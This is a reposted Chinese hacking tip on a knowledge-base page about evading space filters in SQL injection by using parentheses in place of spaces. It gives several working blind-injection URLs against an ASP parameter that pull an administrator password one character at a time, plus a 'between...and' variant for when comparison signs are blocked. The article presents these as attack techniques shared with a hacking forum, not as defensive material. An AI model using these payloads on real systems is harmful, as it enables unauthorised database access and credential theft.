主頁(yè) > 知識(shí)庫(kù) > 突破空格的限制

突破空格的限制
熱門(mén)標(biāo)簽:服務(wù)器配置 Mysql連接數(shù)設(shè)置 阿里云 團(tuán)購(gòu)網(wǎng)站 銀行業(yè)務(wù) Linux服務(wù)器 電子圍欄 科大訊飛語(yǔ)音識(shí)別系統(tǒng)
關(guān)于空格,有許多替換方式,比如TAB空格,SQL數(shù)據(jù)庫(kù)中的/**/,但我又找到了另一種替換方式,已發(fā)表于《黑客手冊(cè)》2006.7期中,這里挑其精華,現(xiàn)一下吧!

對(duì)于SQL語(yǔ)句,大家還都習(xí)慣于其的空格,比如select id from [name],如果中間沒(méi)有了空格,那就成了selectidfrom[name], 一灘糊涂!除了上面所說(shuō)到幾個(gè)空格的替代方法外,我發(fā)現(xiàn)用()括號(hào)在SQL中一樣可以運(yùn)行,比如上面的語(yǔ)句,就可以寫(xiě)成,select(id)from[name],有括號(hào)分隔,可以正常執(zhí)行。
舉個(gè)例 子說(shuō)一下,我們得到一個(gè)注入點(diǎn):jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢(xún)管理員的密碼的語(yǔ)句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實(shí)可以寫(xiě)成這樣的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了和>符號(hào),則用between…and…,語(yǔ)句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

對(duì)于中間應(yīng)該出現(xiàn)空格的地方,用()進(jìn)行替換,不過(guò),對(duì)于很復(fù)雜的SQL語(yǔ)句就不太好用了。上面說(shuō)到的是字符型的,如果是數(shù)值型,可以在id=1后加一個(gè)括號(hào),不過(guò)這個(gè)我沒(méi)有測(cè)試,比如:jmdcw.asp?id=(1)and(select.....),應(yīng)該是可行的吧?

呵呵,總結(jié)一下,和LOVESHELL上的朋友分享一下。 

標(biāo)簽:棗莊 廣元 衢州 大理 萍鄉(xiāng) 江蘇 衡水 蚌埠

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《突破空格的限制》,本文關(guān)鍵詞  ;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 收縮
    • 微信客服
    • 微信二維碼

    • 電話(huà)咨詢(xún)

    • 400-1100-266